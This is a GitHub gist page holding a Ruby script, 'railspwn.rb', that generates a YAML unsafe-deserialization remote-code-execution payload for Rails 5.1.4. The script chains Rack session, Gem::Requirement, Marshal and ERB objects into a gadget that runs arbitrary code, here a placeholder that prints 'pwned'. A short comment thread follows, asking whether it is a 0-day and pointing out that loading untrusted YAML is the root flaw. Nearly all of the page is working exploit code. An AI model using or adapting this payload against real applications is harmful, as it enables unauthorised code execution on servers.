/railspwn.rb
Last active Sep 13, 2018
Rails 5.1.4 YAML unsafe deserialization RCE payload
| require 'yaml' | |
| require 'base64' | |
| require 'erb' | |
| class ActiveSupport | |
| class Deprecation | |
| def initialize() | |
| @silenced = true | |
| end | |
| class DeprecatedInstanceVariableProxy | |
| def initialize(instance, method) | |
| @instance = instance | |
| @method = method | |
| @deprecator = ActiveSupport::Deprecation.new | |
| end | |
| end | |
| end | |
| end | |
| code = <<-EOS | |
| puts "pwned" | |
| EOS | |
| erb = ERB.allocate | |
| erb.instance_variable_set :@src, code | |
| erb.instance_variable_set :@lineno, 1337 | |
| depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result | |
| payload = Base64.encode64(Marshal.dump(depr)).gsub("\n", "") | |
| payload = <<-PAYLOAD | |
| --- | |
| !ruby/object:Gem::Requirement | |
| requirements: | |
| !ruby/object:Rack::Session::Abstract::SessionHash | |
| req: !ruby/object:Rack::Request | |
| env: | |
| "rack.session": !ruby/object:Rack::Session::Abstract::SessionHash | |
| id: 'hi from espr' | |
| HTTP_COOKIE: "a=#{payload}" | |
| store: !ruby/object:Rack::Session::Cookie | |
| coder: !ruby/object:Rack::Session::Cookie::Base64::Marshal {} | |
| key: a | |
| secrets: [] | |
| exists: true | |
| loaded: false | |
| PAYLOAD | |
| puts payload |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
Show comment
Hide comment
RicterZ
commented
Nov 21, 2017
|
A 0-day? I couldn't find any information about this security issue on Rails official website or Github. |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
Show comment
Hide comment
niklasb
May 31, 2018
@RicterZ If you load untrusted YAML without safe mode you have a security issue regardless of this payload
|
@RicterZ If you load untrusted YAML without safe mode you have a security issue regardless of this payload |
This comment has been minimized.
Show comment
Hide comment
This comment has been minimized.
Show comment
Hide comment
g0rx
Sep 13, 2018
RicterZ kinda off ; problem start from 2013 but seem new load untrusted YAML , too bad
g0rx
commented
Sep 13, 2018
|
RicterZ kinda off ; problem start from 2013 but seem new load untrusted YAML , too bad |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
A 0-day? I couldn't find any information about this security issue on Rails official website or Github.